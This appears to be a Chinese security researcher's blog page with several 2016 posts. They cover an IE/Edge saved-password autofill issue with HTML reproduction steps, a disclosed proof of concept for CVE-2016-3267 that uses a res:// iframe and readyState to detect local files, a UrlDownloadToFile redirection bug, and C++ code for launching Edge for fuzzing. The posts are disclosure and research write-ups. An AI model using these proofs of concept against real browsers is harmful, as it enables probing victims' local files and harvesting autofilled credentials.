nul.pw

一个被认为不是安全问题的提交

作者：leonwxqian
时间：December 12, 2016
分类：技术分享
评论

提交时间：3-18
最终确认时间：4-10

MSRC：存在问题但不严重，不修复。
影响范围：IE/EDGE

<input type="text" id="url" value="http://localhost.fbi.gov/a.htm" /><button onclick="document.getElementById('www').src=document.getElementById('url').value">Navigate</button><br/>
<iframe src="about:blank" id="www"></iframe>

<p>---------------------------------------------------------------</p>
<p>step1: put this html in http://127.0.0.1/a.htm </p>
<p>step2: fill the form below and remember the password</p>
</p>
<form action="b.htm" method="post"><input type="text" id="username" name="username"/><input type="password" id="password" name="password"/><br /><input type="submit"  name="commit" value="Log in"/></form><button onclick = "javascript:alert('stored password' + document.getElementById('password').value + ',from: ' + location.href)"> show password </button>
<p>step3: back to this page, navigate to "http://localhost.fbi.gov/a.htm" or whatever website which has same form as the code above.</p><p>
step4: user can fill the form with remembered account/password in 127.0.0.1.
</p>

CVE-2016-3267 漏洞细节

作者：leonwxqian
时间：October 13, 2016
分类：漏洞分析
评论

几个月前（http://www.nul.pw/2016/03/21/143.html）报告的漏洞，微软现在已经修复。
MS16-119 Microsoft Browser Information Disclosure Vulnerability CVE-2016-3267 Wenxiang Qian of Tencent QQBrowser

今天在seebug看到一篇paper（http://paper.seebug.org/64/），与我报的这个类似。从当时观察res相关处理逻辑的代码来看，这一块就整个是一个大坑。

鉴于这个漏洞十分简单，而且已经超过了6个月的缓和期，我就直接公开了。以下是CVE-2016-3267的细节，也是我报告时的原文（的汉译文）。

PoC by blast(Qian Wenxiang)

 <iframe id="r" src="res://c:\windows\system32\cmd.exe/3/1" onreadystatechange="document.getElementById('log').innerText+=readyState+','"></iframe>
<div id="log"></div>

<textarea style="width:100%;height:100%">
File Exists:
IE11= interactive,interactive
IE10- = interactive,complete

File Doesn't Exist:
IE11= loading,interactive
IE10- = interactive,complete

so you can tell it in ie11;
</textarea>

漏洞影响
我注意到你们在元素中已经禁止加载res协议的URI了，在CImgHelper::SetImgCtx中有一个检查v31 = CMarkup::CheckForLMZLLoad(v8, 1)会阻止图片的加载，不过攻击者仍然可以通过Iframe来在互联网域下加载一个资源URI。

通过使用readyState属性，攻击者可以检测本地文件是否存在。例如，"interactive,interactive,"代表文件存在并且被载入了iframe，而"loading, interactive"代表文件不存在。

IE11以下的版本(IE5~10)并不受影响，IE5-10不管文件是否存在，readyState状态变化都为"interactive,complete"。也许你们（微软）应该统一IE11为低版本的策略。

文件重定向与UrlDownloadToFile的丝丝纠缠

作者：leonwxqian
时间：October 13, 2016
分类：技术分享
评论

在wow64进程中，UrlDownloadToFile的逻辑是先把文件down到缓存目录，然后再从缓存目录MoveFile到目标地址。看起来没问题。

如果system启动了一个进程，那么这个进程的temp目录一般在c:\windows\syswow64\config\appdata\local\temp下。

假如我关闭了文件重定向，那么UrlDownloadToFile会产生什么样奇怪的化学反应呢？答案是：bug。

system启动的进程，关闭了文件重定向，然后调用UrlDownloadToFile。

UrlDownloadToFile会把文件缓存到c:\windows\syswow64\config...下，然后从c:\windows\ system32\config...把缓存文件移动到目标目录。

因为文件重定向关闭了，system32不会重定向到syswow64下，MoveFile失败。UrlDownloadToFile也宣告失败。

不过，估计微软也没考虑过这种倒霉情景。

解决方案：

UrlDownloadToFile下载到某个不会重定向的目录。
开启重定向。
MoveFileEx到所需位置。

fuzz程序的第一步：打开edge的几种方法

作者：leonwxqian
时间：August 31, 2016
分类：技术分享
评论

Edge属于Universal App，这类程序不能简单的通过CreateProcess系列函数打开，有人问我打开Edge的几种方式，这里总结一下。如果要给它做Fuzz的话，可以考虑下面三种打开方式去启动Edge。

本文授权drops.wiki及本站共发

0x01 第一种方式——ShellExecute

第一种方式，利用系统自动调用默认浏览器的功能，即：
设置默认浏览器为Edge。
使用ShellExecute(0, L"OPEN", L"HTTP://YOUR-START-PAGE/", NULL, NULL, SW_SHOW);走系统的默认浏览器逻辑启动Edge。

（通过explorer 参数或者.url快捷方式等来启动Edge也属于同样的方式）

这里的流程如下：

ShellExecuteW（ShellExecuteW就是ShellExecuteExW的wrapper）
↓
ShellExecuteExW（ShellExecuteExW则是ShellExecuteNormal的wrapper）
↓
ShellExecuteNormal（可以当作是正式的启动了。在ShellExecuteNormal中，代码创建一个CShellExecute的类的实例，然后调用其ExecuteNormal方法）
↓
CShellExecute::ExecuteNormal（根据启动参数[要启动的文件后缀为.CMD时，或者调用者含有同步原语时不满足]决定是否要使用新线程来调用，传入OPEN打开URL时，满足该判断）
↓
CShellExecute::_RunThreadMaybeWait（执行线程代码简单，创建事件并在新线程中执行具体的启动代码）
↓
pfnThreadProc（调用启动进程的入口CShellExecute::_DoExecute）
↓
CShellExecute::_DoExecute
↓
CShellExecute::_InvokeCtxMenu（它会把获取到的IContextMenu[000214E4-0000-0000-C000-000000000046]接口传给InvokeInProcExec)
↓
CShellExecute::_InvokeInProcExec(根据操作获取CmdId，传给DefFolderMenu::InvokeCommand)
↓
DefFolderMenu::InvokeCommand（这是一个巨大的函数，检测到连接打开的这种情况时，使用HDXA_LetHandlerProcessCommandEx来处理）
↓
HDXA_LetHandlerProcessCommandEx
↓
SHELL32!CRegistryVerbsContextMenu::InvokeCommand（打开URL的这个动作需要读取注册表中指定的动词[open]，这里开始都是根据注册表关联的动词来启动关联程序）
↓
SHELL32!CRegistryVerbsContextMenu::_Execute
↓
windows_storage!CRegDataDrivenCommand::InvokeFromContextMenu
↓
windows_storage!CRegDataDrivenCommand::_Invoke
↓
windows_storage!CRegDataDrivenCommand::_TryInvokeAssociation
↓
windows_storage!CBindAndInvokeStaticVerb::Execute
↓
windows_storage!CBindAndInvokeStaticVerb::_TryExecuteCommandHandler
↓
windows_storage!CBindAndInvokeStaticVerb::_DoCommand
↓
twinui!CAssociationLaunchExecuteCommand::Execute

0x02 第二种方式——microsoft-edge protocol

Win8开始Windows提供的Custom Protocol Activation技术让edge有了这个新启动方式，Windows允许桌面程序和runtime app注册成某个URL scheme name的默认打开程序。通过Manifest注册关联程序的方式可以参考：https://msdn.microsoft.com/en-us/library/windows/apps/hh452686.aspx

UWP Edge可以在：
打开%SYSTEMROOT%\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe，这是Edge的App目录，8wxxx就是它的APPID。
打开AppxManifest.xml，可以看到与之关联的协议之一：

        <uap:Extension Category="windows.protocol">
            <uap:Protocol Name="microsoft-edge">
                <uap:Logo>Assets\MicrosoftEdgeFile.png</uap:Logo>
            </uap:Protocol>
        </uap:Extension>

HKEY_CURRENT_USER\SOFTWARE\Classes\Extensions\ContractId\Windows.Protocol\PackageId\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\ActivatableClassId\ 下即为支持的协议，MicrosoftEdge.AppXeb42j1vh6rk395pm0vmcx57dxqjhej5d.mca是microsoft-edge的项目。

使用microsof-edge protocol。这意味着在C++中只需要CreateProcess系列指定参数为explorer microsoft-edge:http://www.baidu.com/，或者ShellExecute中open microsoft-edge:http://xxx/即可启动。这种方式启动的Edge，不需要用户设置默认浏览器。

所以，许多更愿意把Edge当备胎的用户应该会比较喜欢使用这种方式。

0x03 第三种方式(正经的)——IApplicationActivationManager 接口

直接上代码吧。

// testCallApplicationActivationManager.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <shobjidl.h>
#include <windows.h>
#include <atlcomcli.h>

int main()
{
    CComPtr<IApplicationActivationManager> piaam;
    CComPtr<IUnknown> punk;

    CoInitializeEx(NULL, COINIT_MULTITHREADED);
    LPCWSTR appId = L"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge";
    IApplicationActivationManager* paam = NULL;
    HRESULT hr = E_FAIL;
    LPCWSTR url = L"www.wooyun.org";
    do
    {
        hr = CoCreateInstance(CLSID_ApplicationActivationManager, NULL, 
            CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&paam));
        if (FAILED(hr))
            break;
        DWORD pid = 0;
        hr = paam->ActivateApplication(appId, url, AO_NONE, &pid);
        if (FAILED(hr))
            break;
    } while (0);

    return 0;
}

参考资料
【1】UWP是什么：https://msdn.microsoft.com/en-us/windows/uwp/get-started/whats-a-uwp
【2】https://www.microsoft.com/msj/0199/com/com0199.aspx